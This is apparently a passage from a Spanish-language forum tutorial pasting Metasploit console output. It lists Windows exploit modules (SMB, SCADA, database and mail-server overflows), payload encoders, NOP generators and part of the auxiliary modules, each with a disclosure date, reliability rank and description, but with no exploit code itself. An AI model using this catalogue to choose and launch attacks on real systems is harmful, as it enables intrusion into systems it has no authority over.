   windows/misc/hp_omniinet_3                                        2011-06-29       great      HP OmniInet.exe Opcode 27 Buffer Overflow
   windows/misc/hp_omniinet_4                                        2011-06-29       good       HP OmniInet.exe Opcode 20 Buffer Overflow
   windows/misc/hp_operations_agent_coda_34                          2012-07-09       normal     HP Operations Agent Opcode coda.exe 0x34 Buffer Overflow
   windows/misc/hp_operations_agent_coda_8c                          2012-07-09       normal     HP Operations Agent Opcode coda.exe 0x8c Buffer Overflow
   windows/misc/hp_ovtrace                                           2007-08-09       average    HP OpenView Operations OVTrace Buffer Overflow
   windows/misc/hta_server                                           2016-10-06       manual     HTA Web Server
   windows/misc/ib_isc_attach_database                               2007-10-03       good       Borland InterBase isc_attach_database() Buffer Overflow
   windows/misc/ib_isc_create_database                               2007-10-03       good       Borland InterBase isc_create_database() Buffer Overflow
   windows/misc/ib_svc_attach                                        2007-10-03       good       Borland InterBase SVC_attach() Buffer Overflow
   windows/misc/ibm_cognos_tm1admsd_bof                              2012-04-02       normal     IBM Cognos tm1admsd.exe Overflow
   windows/misc/ibm_director_cim_dllinject                           2009-03-10       excellent  IBM System Director Agent DLL Injection
   windows/misc/ibm_tsm_cad_ping                                     2009-11-04       good       IBM Tivoli Storage Manager Express CAD Service Buffer Overflow
   windows/misc/ibm_tsm_rca_dicugetidentify                          2009-11-04       great      IBM Tivoli Storage Manager Express RCA Service Buffer Overflow
   windows/misc/ibm_websphere_java_deserialize                       2015-11-06       excellent  IBM WebSphere RCE Java Deserialization Vulnerability
   windows/misc/itunes_extm3u_bof                                    2012-06-21       normal     Apple iTunes 10 Extended M3U Stack Buffer Overflow
   windows/misc/landesk_aolnsrvr                                     2007-04-13       average    LANDesk Management Suite 8.7 Alert Service Buffer Overflow
   windows/misc/lianja_db_net                                        2013-05-22       normal     Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow
   windows/misc/manageengine_eventlog_analyzer_rce                   2015-07-11       manual     ManageEngine EventLog Analyzer Remote Code Execution
   windows/misc/mercury_phonebook                                    2005-12-19       average    Mercury/32 PH Server Module Buffer Overflow
   windows/misc/mini_stream                                          2009-12-25       normal     Mini-Stream 3.0.1.1 Buffer Overflow
   windows/misc/mirc_privmsg_server                                  2008-10-02       normal     mIRC PRIVMSG Handling Stack Buffer Overflow
   windows/misc/ms07_064_sami                                        2007-12-11       normal     MS07-064 Microsoft DirectX DirectShow SAMI Buffer Overflow
   windows/misc/ms10_104_sharepoint                                  2010-12-14       excellent  MS10-104 Microsoft Office SharePoint Server 2007 Remote Code Execution
   windows/misc/netcat110_nt                                         2004-12-27       great      Netcat v1.10 NT Stack Buffer Overflow
   windows/misc/nettransport                                         2010-01-02       normal     NetTransport Download Manager 2.90.510 Buffer Overflow
   windows/misc/nvidia_mental_ray                                    2013-12-10       excellent  Nvidia Mental Ray Satellite Service Arbitrary DLL Injection
   windows/misc/plugx                                                2017-07-27       normal     PlugX Controller Stack Overflow
   windows/misc/poisonivy_21x_bof                                    2016-06-03       normal     Poison Ivy 2.1.x C2 Buffer Overflow
   windows/misc/poisonivy_bof                                        2012-06-24       normal     Poison Ivy Server Buffer Overflow
   windows/misc/poppeeper_date                                       2009-02-27       normal     POP Peeper v3.4 DATE Buffer Overflow
   windows/misc/poppeeper_uidl                                       2009-02-27       normal     POP Peeper v3.4 UIDL Buffer Overflow
   windows/misc/realtek_playlist                                     2008-12-16       great      Realtek Media Player Playlist Buffer Overflow
   windows/misc/regsvr32_applocker_bypass_server                     2016-04-19       manual     Regsvr32.exe (.sct) Application Whitelisting Bypass Server
   windows/misc/sap_2005_license                                     2009-08-01       great      SAP Business One License Manager 2005 Buffer Overflow
   windows/misc/sap_netweaver_dispatcher                             2012-05-08       normal     SAP NetWeaver Dispatcher DiagTraceR3Info Buffer Overflow
   windows/misc/shixxnote_font                                       2004-10-04       great      ShixxNOTE 6.net Font Field Overflow
   windows/misc/solidworks_workgroup_pdmwservice_file_write          2014-02-22       good       SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write
   windows/misc/splayer_content_type                                 2011-05-04       normal     SPlayer 3.7 Content-Type Buffer Overflow
   windows/misc/stream_down_bof                                      2011-12-27       good       CoCSoft StreamDown 6.8.0 Buffer Overflow
   windows/misc/talkative_response                                   2009-03-17       normal     Talkative IRC v0.4.4.16 Response Buffer Overflow
   windows/misc/tiny_identd_overflow                                 2007-05-14       average    TinyIdentD 2.2 Stack Buffer Overflow
   windows/misc/trendmicro_cmdprocessor_addtask                      2011-12-07       good       TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow
   windows/misc/ufo_ai                                               2009-10-28       average    UFO: Alien Invasion IRC Client Buffer Overflow
   windows/misc/vmhgfs_webdav_dll_sideload                           2016-08-05       normal     DLL Side Loading Vulnerability in VMware Host Guest Client Redirector
   windows/misc/windows_rsh                                          2007-07-24       average    Windows RSH Daemon Buffer Overflow
   windows/misc/wireshark_lua                                        2011-07-18       excellent  Wireshark console.lua Pre-Loading Script Execution
   windows/misc/wireshark_packet_dect                                2011-04-18       good       Wireshark packet-dect.c Stack Buffer Overflow
   windows/mmsp/ms10_025_wmss_connect_funnel                         2010-04-13       great      Windows Media Services ConnectFunnel Stack Buffer Overflow
   windows/motorola/timbuktu_fileupload                              2008-05-10       excellent  Timbuktu Pro Directory Traversal/File Upload
   windows/mssql/lyris_listmanager_weak_pass                         2005-12-08       excellent  Lyris ListManager MSDE Weak sa Password
   windows/mssql/ms02_039_slammer                                    2002-07-24       good       MS02-039 Microsoft SQL Server Resolution Overflow
   windows/mssql/ms02_056_hello                                      2002-08-05       good       MS02-056 Microsoft SQL Server Hello Overflow
   windows/mssql/ms09_004_sp_replwritetovarbin                       2008-12-09       good       MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption
   windows/mssql/ms09_004_sp_replwritetovarbin_sqli                  2008-12-09       excellent  MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection
   windows/mssql/mssql_clr_payload                                   1999-01-01       excellent  Microsoft SQL Server Clr Stored Procedure Payload Execution
   windows/mssql/mssql_linkcrawler                                   2000-01-01       great      Microsoft SQL Server Database Link Crawling Command Execution
   windows/mssql/mssql_payload                                       2000-05-30       excellent  Microsoft SQL Server Payload Execution
   windows/mssql/mssql_payload_sqli                                  2000-05-30       excellent  Microsoft SQL Server Payload Execution via SQL Injection
   windows/mysql/mysql_mof                                           2012-12-01       excellent  Oracle MySQL for Microsoft Windows MOF Execution
   windows/mysql/mysql_payload                                       2009-01-16       excellent  Oracle MySQL for Microsoft Windows Payload Execution
   windows/mysql/mysql_start_up                                      2012-12-01       excellent  Oracle MySQL for Microsoft Windows FILE Privilege Abuse
   windows/mysql/mysql_yassl_hello                                   2008-01-04       average    MySQL yaSSL SSL Hello Message Buffer Overflow
   windows/mysql/scrutinizer_upload_exec                             2012-07-27       excellent  Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential
   windows/nfs/xlink_nfsd                                            2006-11-06       average    Omni-NFS Server Buffer Overflow
   windows/nntp/ms05_030_nntp                                        2005-06-14       normal     MS05-030 Microsoft Outlook Express NNTP Response Parsing Buffer Overflow
   windows/novell/file_reporter_fsfui_upload                         2012-11-16       great      NFR Agent FSFUI Record File Upload RCE
   windows/novell/groupwisemessenger_client                          2008-07-02       normal     Novell GroupWise Messenger Client Buffer Overflow
   windows/novell/netiq_pum_eval                                     2012-11-15       excellent  NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution
   windows/novell/nmap_stor                                          2006-12-23       average    Novell NetMail NMAP STOR Buffer Overflow
   windows/novell/zenworks_desktop_agent                             2005-05-19       good       Novell ZENworks 6.5 Desktop/Server Management Overflow
   windows/novell/zenworks_preboot_op21_bof                          2010-03-30       normal     Novell ZENworks Configuration Management Preboot Service 0x21 Buffer Overflow
   windows/novell/zenworks_preboot_op4c_bof                          2012-02-22       normal     Novell ZENworks Configuration Management Preboot Service 0x4c Buffer Overflow
   windows/novell/zenworks_preboot_op6_bof                           2010-03-30       normal     Novell ZENworks Configuration Management Preboot Service 0x06 Buffer Overflow
   windows/novell/zenworks_preboot_op6c_bof                          2012-02-22       normal     Novell ZENworks Configuration Management Preboot Service 0x6c Buffer Overflow
   windows/oracle/client_system_analyzer_upload                      2011-01-18       excellent  Oracle Database Client System Analyzer Arbitrary File Upload
   windows/oracle/extjob                                             2007-01-01       excellent  Oracle Job Scheduler Named Pipe Command Execution
   windows/oracle/osb_ndmp_auth                                      2009-01-14       good       Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow
   windows/oracle/tns_arguments                                      2001-06-28       good       Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow
   windows/oracle/tns_auth_sesskey                                   2009-10-20       great      Oracle 10gR2 TNS Listener AUTH_SESSKEY Buffer Overflow
   windows/oracle/tns_service_name                                   2002-05-27       good       Oracle 8i TNS Listener SERVICE_NAME Buffer Overflow
   windows/pop3/seattlelab_pass                                      2003-05-07       great      Seattle Lab Mail 5.5 POP3 Buffer Overflow
   windows/postgres/postgres_payload                                 2009-04-10       excellent  PostgreSQL for Microsoft Windows Payload Execution
   windows/proxy/bluecoat_winproxy_host                              2005-01-05       great      Blue Coat WinProxy Host Header Overflow
   windows/proxy/ccproxy_telnet_ping                                 2004-11-11       average    CCProxy Telnet Proxy Ping Overflow
   windows/proxy/proxypro_http_get                                   2004-02-23       great      Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow
   windows/proxy/qbik_wingate_wwwproxy                               2006-06-07       good       Qbik WinGate WWW Proxy Server URL Processing Overflow
   windows/scada/abb_wserver_exec                                    2013-04-05       excellent  ABB MicroSCADA wserver.exe Remote Code Execution
   windows/scada/advantech_webaccess_dashboard_file_upload           2016-02-05       excellent  Advantech WebAccess Dashboard Viewer uploadImageCommon Arbitrary File Upload
   windows/scada/citect_scada_odbc                                   2008-06-11       normal     CitectSCADA/CitectFacilities ODBC Buffer Overflow
   windows/scada/codesys_gateway_server_traversal                    2013-02-02       excellent  SCADA 3S CoDeSys Gateway Server Directory Traversal
   windows/scada/codesys_web_server                                  2011-12-02       normal     SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow
   windows/scada/daq_factory_bof                                     2011-09-13       good       DaqFactory HMI NETB Request Overflow
   windows/scada/factorylink_csservice                               2011-03-25       normal     Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
   windows/scada/factorylink_vrn_09                                  2011-03-21       average    Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
   windows/scada/ge_proficy_cimplicity_gefebt                        2014-01-23       excellent  GE Proficy CIMPLICITY gefebt.exe Remote Code Execution
   windows/scada/iconics_genbroker                                   2011-03-21       good       Iconics GENESIS32 Integer Overflow Version 9.21.201.01
   windows/scada/iconics_webhmi_setactivexguid                       2011-05-05       good       ICONICS WebHMI ActiveX Buffer Overflow
   windows/scada/igss9_igssdataserver_listall                        2011-03-24       good       7-Technologies IGSS IGSSdataServer.exe Stack Buffer Overflow
   windows/scada/igss9_igssdataserver_rename                         2011-03-24       normal     7-Technologies IGSS 9 IGSSdataServer .RMS Rename Buffer Overflow
   windows/scada/igss9_misc                                          2011-03-24       excellent  7-Technologies IGSS 9 Data Server/Collector Packet Handling Vulnerabilities
   windows/scada/igss_exec_17                                        2011-03-21       excellent  Interactive Graphical SCADA System Remote Command Injection
   windows/scada/indusoft_webstudio_exec                             2011-11-04       excellent  InduSoft Web Studio Arbitrary Upload Remote Code Execution
   windows/scada/moxa_mdmtool                                        2010-10-20       great      MOXA Device Manager Tool 2.1 Buffer Overflow
   windows/scada/procyon_core_server                                 2011-09-08       normal     Procyon Core Server HMI Coreservice.exe Stack Buffer Overflow
   windows/scada/realwin                                             2008-09-26       great      DATAC RealWin SCADA Server Buffer Overflow
   windows/scada/realwin_on_fc_binfile_a                             2011-03-21       great      DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow
   windows/scada/realwin_on_fcs_login                                2011-03-21       great      RealWin SCADA Server DATAC Login Buffer Overflow
   windows/scada/realwin_scpc_initialize                             2010-10-15       great      DATAC RealWin SCADA Server SCPC_INITIALIZE Buffer Overflow
   windows/scada/realwin_scpc_initialize_rf                          2010-10-15       great      DATAC RealWin SCADA Server SCPC_INITIALIZE_RF Buffer Overflow
   windows/scada/realwin_scpc_txtevent                               2010-11-18       great      DATAC RealWin SCADA Server SCPC_TXTEVENT Buffer Overflow
   windows/scada/scadapro_cmdexe                                     2011-09-16       excellent  Measuresoft ScadaPro Remote Command Execution
   windows/scada/sunway_force_control_netdbsrv                       2011-09-22       great      Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57
   windows/scada/winlog_runtime                                      2011-01-13       great      Sielco Sistemi Winlog Buffer Overflow
   windows/scada/winlog_runtime_2                                    2012-06-04       normal     Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16
   windows/scada/yokogawa_bkbcopyd_bof                               2014-03-10       normal     Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow
   windows/scada/yokogawa_bkesimmgr_bof                              2014-03-10       normal     Yokogawa CS3000 BKESimmgr.exe Buffer Overflow
   windows/scada/yokogawa_bkfsim_vhfd                                2014-05-23       normal     Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow
   windows/scada/yokogawa_bkhodeq_bof                                2014-03-10       average    Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow
   windows/sip/aim_triton_cseq                                       2006-07-10       great      AIM Triton 1.0.4 CSeq Buffer Overflow
   windows/sip/sipxezphone_cseq                                      2006-07-10       great      SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
   windows/sip/sipxphone_cseq                                        2006-07-10       great      SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
   windows/smb/generic_smb_dll_injection                             2015-03-04       manual     Generic DLL Injection From Shared Resource
   windows/smb/group_policy_startup                                  2015-01-26       manual     Group Policy Script Execution From Shared Resource
   windows/smb/ipass_pipe_exec                                       2015-01-21       excellent  IPass Control Pipe Remote Command Execution
   windows/smb/ms03_049_netapi                                       2003-11-11       good       MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
   windows/smb/ms04_007_killbill                                     2004-02-10       low        MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow
   windows/smb/ms04_011_lsass                                        2004-04-13       good       MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow
   windows/smb/ms04_031_netdde                                       2004-10-12       good       MS04-031 Microsoft NetDDE Service Overflow
   windows/smb/ms05_039_pnp                                          2005-08-09       good       MS05-039 Microsoft Plug and Play Service Overflow
   windows/smb/ms06_025_rasmans_reg                                  2006-06-13       good       MS06-025 Microsoft RRAS Service RASMAN Registry Overflow
   windows/smb/ms06_025_rras                                         2006-06-13       average    MS06-025 Microsoft RRAS Service Overflow
   windows/smb/ms06_040_netapi                                       2006-08-08       good       MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
   windows/smb/ms06_066_nwapi                                        2006-11-14       good       MS06-066 Microsoft Services nwapi32.dll Module Exploit
   windows/smb/ms06_066_nwwks                                        2006-11-14       good       MS06-066 Microsoft Services nwwks.dll Module Exploit
   windows/smb/ms06_070_wkssvc                                       2006-11-14       manual     MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
   windows/smb/ms07_029_msdns_zonename                               2007-04-12       manual     MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)
   windows/smb/ms08_067_netapi                                       2008-10-28       great      MS08-067 Microsoft Server Service Relative Path Stack Corruption
   windows/smb/ms09_050_smb2_negotiate_func_index                    2009-09-07       good       MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
   windows/smb/ms10_046_shortcut_icon_dllloader                      2010-07-16       excellent  Microsoft Windows Shell LNK Code Execution
   windows/smb/ms10_061_spoolss                                      2010-09-14       excellent  MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability
   windows/smb/ms15_020_shortcut_icon_dllloader                      2015-03-10       excellent  Microsoft Windows Shell LNK Code Execution
   windows/smb/ms17_010_eternalblue                                  2017-03-14       average    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   windows/smb/netidentity_xtierrpcpipe                              2009-04-06       great      Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow
   windows/smb/psexec                                                1999-01-01       manual     Microsoft Windows Authenticated User Code Execution
   windows/smb/psexec_psh                                            1999-01-01       manual     Microsoft Windows Authenticated Powershell Command Execution
   windows/smb/smb_delivery                                          2016-07-26       excellent  SMB Delivery
   windows/smb/smb_relay                                             2001-03-31       excellent  MS08-068 Microsoft Windows SMB Relay Code Execution
   windows/smb/timbuktu_plughntcommand_bof                           2009-06-25       great      Timbuktu PlughNTCommand Named Pipe Buffer Overflow
   windows/smtp/mailcarrier_smtp_ehlo                                2004-10-26       good       TABS MailCarrier v2.51 SMTP EHLO Overflow
   windows/smtp/mercury_cram_md5                                     2007-08-18       great      Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
   windows/smtp/ms03_046_exchange2000_xexch50                        2003-10-15       good       MS03-046 Exchange 2000 XEXCH50 Heap Overflow
   windows/smtp/njstar_smtp_bof                                      2011-10-31       normal     NJStar Communicator 3.00 MiniSMTP Buffer Overflow
   windows/smtp/sysgauge_client_bof                                  2017-02-28       normal     SysGauge SMTP Validation Buffer Overflow
   windows/smtp/wmailserver                                          2005-07-11       average    SoftiaCom WMailserver 1.0 Buffer Overflow
   windows/smtp/ypops_overflow1                                      2004-09-27       average    YPOPS 0.6 Buffer Overflow
   windows/ssh/freeftpd_key_exchange                                 2006-05-12       average    FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow
   windows/ssh/freesshd_authbypass                                   2010-08-11       excellent  Freesshd Authentication Bypass
   windows/ssh/freesshd_key_exchange                                 2006-05-12       average    FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow
   windows/ssh/putty_msg_debug                                       2002-12-16       normal     PuTTY Buffer Overflow
   windows/ssh/securecrt_ssh1                                        2002-07-23       average    SecureCRT SSH1 Buffer Overflow
   windows/ssh/sysax_ssh_username                                    2012-02-27       normal     Sysax 5.53 SSH Username Buffer Overflow
   windows/ssl/ms04_011_pct                                          2004-04-13       average    MS04-011 Microsoft Private Communications Transport Overflow
   windows/telnet/gamsoft_telsrv_username                            2000-07-17       average    GAMSoft TelSrv 1.5 Username Buffer Overflow
   windows/telnet/goodtech_telnet                                    2005-03-15       average    GoodTech Telnet Server Buffer Overflow
   windows/tftp/attftp_long_filename                                 2006-11-27       average    Allied Telesyn TFTP Server 1.9 Long Filename Overflow
   windows/tftp/distinct_tftp_traversal                              2012-04-08       excellent  Distinct TFTP 3.10 Writable Directory Traversal Execution
   windows/tftp/dlink_long_filename                                  2007-03-12       good       D-Link TFTP 1.0 Long Filename Buffer Overflow
   windows/tftp/futuresoft_transfermode                              2005-05-31       average    FutureSoft TFTP Server 2000 Transfer-Mode Overflow
   windows/tftp/netdecision_tftp_traversal                           2009-05-16       excellent  NetDecision 4.2 TFTP Writable Directory Traversal Execution
   windows/tftp/opentftp_error_code                                  2008-07-05       average    OpenTFTP SP 1.4 Error Packet Overflow
   windows/tftp/quick_tftp_pro_mode                                  2008-03-27       good       Quick FTP Pro 2.1 Transfer-Mode Overflow
   windows/tftp/tftpd32_long_filename                                2002-11-19       average    TFTPD32 Long Filename Buffer Overflow
   windows/tftp/tftpdwin_long_filename                               2006-09-21       great      TFTPDWIN v0.4.2 Long Filename Buffer Overflow
   windows/tftp/tftpserver_wrq_bof                                   2008-03-26       normal     TFTP Server for Windows 1.4 ST WRQ Buffer Overflow
   windows/tftp/threectftpsvc_long_mode                              2006-11-27       great      3CTftpSvc TFTP Long Mode Buffer Overflow
   windows/unicenter/cam_log_security                                2005-08-22       great      CA CAM log_security() Stack Buffer Overflow (Win32)
   windows/vnc/realvnc_client                                        2001-01-29       normal     RealVNC 3.3.7 Client Buffer Overflow
   windows/vnc/ultravnc_client                                       2006-04-04       normal     UltraVNC 1.0.1 Client Buffer Overflow
   windows/vnc/ultravnc_viewer_bof                                   2008-02-06       normal     UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
   windows/vnc/winvnc_http_get                                       2001-01-29       average    WinVNC Web Server GET Overflow
   windows/vpn/safenet_ike_11                                        2009-06-01       average    SafeNet SoftRemote IKE Service Buffer Overflow
   windows/winrm/winrm_script_exec                                   2012-11-01       manual     WinRM Script Exec Remote Code Execution
   windows/wins/ms04_045_wins                                        2004-12-14       great      MS04-045 Microsoft WINS Service Memory Overwrite

Código: [Seleccionar]
show encoders
Código: [Seleccionar]
msf > show encoders

Encoders
========

   Name                          Disclosure Date  Rank       Description
   ----                          ---------------  ----       -----------
   cmd/echo                                       good       Echo Command Encoder
   cmd/generic_sh                                 manual     Generic Shell Variable Substitution Command Encoder
   cmd/ifs                                        low        Generic ${IFS} Substitution Command Encoder
   cmd/perl                                       normal     Perl Command Encoder
   cmd/powershell_base64                          excellent  Powershell Base64 Command Encoder
   cmd/printf_php_mq                              manual     printf(1) via PHP magic_quotes Utility Command Encoder
   generic/eicar                                  manual     The EICAR Encoder
   generic/none                                   normal     The "none" Encoder
   mipsbe/byte_xori                               normal     Byte XORi Encoder
   mipsbe/longxor                                 normal     XOR Encoder
   mipsle/byte_xori                               normal     Byte XORi Encoder
   mipsle/longxor                                 normal     XOR Encoder
   php/base64                                     great      PHP Base64 Encoder
   ppc/longxor                                    normal     PPC LongXOR Encoder
   ppc/longxor_tag                                normal     PPC LongXOR Encoder
   sparc/longxor_tag                              normal     SPARC DWORD XOR Encoder
   x64/xor                                        normal     XOR Encoder
   x64/zutto_dekiru                               manual     Zutto Dekiru
   x86/add_sub                                    manual     Add/Sub Encoder
   x86/alpha_mixed                                low        Alpha2 Alphanumeric Mixedcase Encoder
   x86/alpha_upper                                low        Alpha2 Alphanumeric Uppercase Encoder
   x86/avoid_underscore_tolower                   manual     Avoid underscore/tolower
   x86/avoid_utf8_tolower                         manual     Avoid UTF8/tolower
   x86/bloxor                                     manual     BloXor - A Metamorphic Block Based XOR Encoder
   x86/bmp_polyglot                               manual     BMP Polyglot
   x86/call4_dword_xor                            normal     Call+4 Dword XOR Encoder
   x86/context_cpuid                              manual     CPUID-based Context Keyed Payload Encoder
   x86/context_stat                               manual     stat(2)-based Context Keyed Payload Encoder
   x86/context_time                               manual     time(2)-based Context Keyed Payload Encoder
   x86/countdown                                  normal     Single-byte XOR Countdown Encoder
   x86/fnstenv_mov                                normal     Variable-length Fnstenv/mov Dword XOR Encoder
   x86/jmp_call_additive                          normal     Jump/Call XOR Additive Feedback Encoder
   x86/nonalpha                                   low        Non-Alpha Encoder
   x86/nonupper                                   low        Non-Upper Encoder
   x86/opt_sub                                    manual     Sub Encoder (optimised)
   x86/service                                    manual     Register Service
   x86/shikata_ga_nai                             excellent  Polymorphic XOR Additive Feedback Encoder
   x86/single_static_bit                          manual     Single Static Bit
   x86/unicode_mixed                              manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
   x86/unicode_upper                              manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

Código: [Seleccionar]
show nops
Código: [Seleccionar]
msf > show nops

NOP Generators
==============

   Name             Disclosure Date  Rank    Description
   ----             ---------------  ----    -----------
   aarch64/simple                    normal  Simple
   armle/simple                      normal  Simple
   mipsbe/better                     normal  Better
   php/generic                       normal  PHP Nop Generator
   ppc/simple                        normal  Simple
   sparc/random                      normal  SPARC NOP Generator
   tty/generic                       normal  TTY Nop Generator
   x64/simple                        normal  Simple
   x86/opty2                         normal  Opty2
   x86/single_byte                   normal  Single Byte

Código: [Seleccionar]
show auxiliary
Código: [Seleccionar]
msf > show auxiliary

Auxiliary
=========

   Name                                                           Disclosure Date  Rank    Description
   ----                                                           ---------------  ----    -----------
   admin/2wire/xslt_password_reset                                2007-08-15       normal  2Wire Cross-Site Request Forgery Password Reset Vulnerability
   admin/android/google_play_store_uxss_xframe_rce                                 normal  Android Browser RCE Through Google Play Store XFO
   admin/appletv/appletv_display_image                                             normal  Apple TV Image Remote Control
   admin/appletv/appletv_display_video                                             normal  Apple TV Video Remote Control
   admin/atg/atg_client                                                            normal  Veeder-Root Automatic Tank Gauge (ATG) Administrative Client
   admin/aws/aws_launch_instances                                                  normal  Launches Hosts in AWS
   admin/backupexec/dump                                                           normal  Veritas Backup Exec Windows Remote File Access
   admin/backupexec/registry                                                       normal  Veritas Backup Exec Server Registry Access
   admin/chromecast/chromecast_reset                                               normal  Chromecast Factory Reset DoS
   admin/chromecast/chromecast_youtube                                             normal  Chromecast YouTube Remote Control
   admin/cisco/cisco_asa_extrabacon                                                normal  Cisco ASA Authentication Bypass (EXTRABACON)
   admin/cisco/cisco_secure_acs_bypass                                             normal  Cisco Secure ACS Unauthorized Password Change
   admin/cisco/vpn_3000_ftp_bypass                                2006-08-23       normal  Cisco VPN Concentrator 3000 FTP Unauthorized Administrative Access
   admin/db2/db2rcmd                                              2004-03-04       normal  IBM DB2 db2rcmd.exe Command Execution Vulnerability
   admin/dns/dyn_dns_update                                                        normal  DNS Server Dynamic Update Record Injection
   admin/edirectory/edirectory_dhost_cookie                                        normal  Novell eDirectory DHOST Predictable Session Cookie
   admin/edirectory/edirectory_edirutil                                            normal  Novell eDirectory eMBox Unauthenticated File Access
   admin/emc/alphastor_devicemanager_exec                         2008-05-27       normal  EMC AlphaStor Device Manager Arbitrary Command Execution
   admin/emc/alphastor_librarymanager_exec                        2008-05-27       normal  EMC AlphaStor Library Manager Arbitrary Command Execution
   admin/firetv/firetv_youtube                                                     normal  Amazon Fire TV YouTube Remote Control
   admin/hp/hp_data_protector_cmd                                 2011-02-07       normal  HP Data Protector 6.1 EXEC_CMD Command Execution
   admin/hp/hp_imc_som_create_account                             2013-10-08       normal  HP Intelligent Management SOM Account Creation
   admin/http/allegro_rompager_auth_bypass                        2014-12-17       normal  Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass
   admin/http/arris_motorola_surfboard_backdoor_xss               2015-04-08       normal  Arris / Motorola Surfboard SBG6580 Web Interface Takeover
   admin/http/axigen_file_access                                  2012-10-31       normal  Axigen Arbitrary File Read and Delete
   admin/http/cfme_manageiq_evm_pass_reset                        2013-11-12       normal  Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection
   admin/http/contentkeeper_fileaccess                                             normal  ContentKeeper Web Appliance mimencode File Access
   admin/http/dlink_dir_300_600_exec_noauth                       2013-02-04       normal  D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
   admin/http/dlink_dir_645_password_extractor                                     normal  D-Link DIR 645 Password Extractor
   admin/http/dlink_dsl320b_password_extractor                                     normal  D-Link DSL 320B Password Extractor
   admin/http/foreman_openstack_satellite_priv_esc                2013-06-06       normal  Foreman (Red Hat OpenStack/Satellite) users/create Mass Assignment
   admin/http/hp_web_jetadmin_exec                                2004-04-27       normal  HP Web JetAdmin 6.5 Server Arbitrary Command Execution
   admin/http/iis_auth_bypass                                     2010-07-02       normal  MS10-065 Microsoft IIS 5 NTFS Stream Authentication Bypass
   admin/http/intersil_pass_reset                                 2007-09-10       normal  Intersil (Boa) HTTPd Basic Authentication Password Reset
   admin/http/iomega_storcenterpro_sessionid                                       normal  Iomega StorCenter Pro NAS Web Authentication Bypass
   admin/http/jboss_bshdeployer                                                    normal  JBoss JMX Console Beanshell Deployer WAR Upload and Deployment
   admin/http/jboss_deploymentfilerepository                                       normal  JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment
   admin/http/jboss_seam_exec                                     2010-07-19       normal  JBoss Seam 2 Remote Command Execution
   admin/http/joomla_registration_privesc                         2016-10-25       normal  Joomla Account Creation and Privilege Escalation
   admin/http/kaseya_master_admin                                 2015-09-23       normal  Kaseya VSA Master Administrator Account Creation
   admin/http/katello_satellite_priv_esc                          2014-03-24       normal  Katello (Red Hat Satellite) users/update_roles Missing Authorization
   admin/http/limesurvey_file_download                            2015-10-12       normal  Limesurvey Unauthenticated File Download
   admin/http/linksys_e1500_e2500_exec                            2013-02-05       normal  Linksys E1500/E2500 Remote Command Execution
   admin/http/linksys_tmunblock_admin_reset_bof                   2014-02-19       normal  Linksys WRT120N tmUnblock Stack Buffer Overflow
   admin/http/linksys_wrt54gl_exec                                2013-01-18       normal  Linksys WRT54GL Remote Command Execution
   admin/http/manage_engine_dc_create_admin                       2014-12-31       normal  ManageEngine Desktop Central Administrator Account Creation
   admin/http/manageengine_dir_listing                            2015-01-28       normal  ManageEngine Multiple Products Arbitrary Directory Listing
   admin/http/manageengine_file_download                          2015-01-28       normal  ManageEngine Multiple Products Arbitrary File Download
   admin/http/manageengine_pmp_privesc                            2014-11-08       normal  ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   admin/http/mantisbt_password_reset                             2017-04-16       normal  MantisBT password reset
   admin/http/mutiny_frontend_read_delete                         2013-05-15       normal  Mutiny 5 Arbitrary File Read and Delete
   admin/http/netflow_file_download                               2014-11-30       normal  ManageEngine NetFlow Analyzer Arbitrary File Download
   admin/http/netgear_auth_download                               2016-02-04       normal  NETGEAR ProSafe Network Management System 300 Authenticated File Download
   admin/http/netgear_soap_password_extractor                     2015-02-11       normal  Netgear Unauthenticated SOAP Password Extractor
   admin/http/netgear_wnr2000_pass_recovery                       2016-12-20       normal  NETGEAR WNR2000v5 Administrator Password Recovery
   admin/http/nexpose_xxe_file_read                                                normal  Nexpose XXE Arbitrary File Read
   admin/http/novell_file_reporter_filedelete                                      normal  Novell File Reporter Agent Arbitrary File Delete
